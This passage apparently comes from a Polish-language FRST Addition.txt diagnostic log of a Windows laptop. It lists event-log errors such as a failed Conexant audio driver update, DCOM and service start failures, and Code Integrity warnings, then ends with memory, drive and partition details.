Description: Instalacja nie powiodła się: system Windows nie mógł zainstalować następującej aktualizacji, ponieważ wystąpił błąd 0x80070103: Conexant driver update for Conexant SmartAudio HD.
Error: (03/07/2016 06:28:17 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi HP Support Solutions Framework Service z powodu następującego błędu:
%%2
Error: (03/07/2016 06:23:36 PM) (Source: DCOM) (EventID: 10010) (User: TSB-MB)
Description: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
Error: (03/07/2016 06:23:35 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Synchronizuj hosta_6a9a8 niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 10000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.
Error: (03/07/2016 06:23:35 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: właściwe dla aplikacjiLokalnyAktywacja{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}ZARZĄDZANIE NTSYSTEMS-1-5-18LocalHost (użycie LRPC)NiedostępnyNiedostępny
Error: (03/07/2016 06:20:44 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: ZARZĄDZANIE NT)
Description: Instalacja nie powiodła się: system Windows nie mógł zainstalować następującej aktualizacji, ponieważ wystąpił błąd 0x80070103: Conexant driver update for Conexant SmartAudio HD.
Error: (03/07/2016 06:14:37 PM) (Source: Microsoft-Windows-Ntfs) (EventID: 98) (User: ZARZĄDZANIE NT)
Description: H:\Device\HarddiskVolume62
Error: (03/07/2016 06:12:15 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi ImControllerService z powodu następującego błędu:
%%1053
Error: (03/07/2016 06:12:15 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą ImControllerService.
Error: (03/07/2016 06:10:38 PM) (Source: DCOM) (EventID: 10010) (User: TSB-MB)
Description: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
CodeIntegrity:
===================================
Date: 2016-03-02 16:22:21.404
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-03-02 15:45:48.765
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-03-02 13:58:28.190
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-02-16 10:12:25.337
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-14 22:14:34.500
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-02-14 22:05:00.255
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-10 09:51:30.327
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-03 08:04:49.695
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-02-02 23:52:36.564
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-02-02 09:07:16.232
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
==================== Statystyki pamięci ===========================
Procesor: Intel(R) Celeron(R) CPU 1005M @ 1.90GHz
Procent pamięci w użyciu: 43%
Całkowita pamięć fizyczna: 3240.35 MB
Dostępna pamięć fizyczna: 1829.91 MB
Całkowita pamięć wirtualna: 5928.35 MB
Dostępna pamięć wirtualna: 4298.01 MB
==================== Dyski ================================
Drive c: () (Fixed) (Total:199.95 GB) (Free:70.03 GB) NTFS
==================== MBR & Tablica partycji ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 5B84479B)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=199.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=97.7 GB) - (Type=06)
==================== Koniec Addition.txt ============================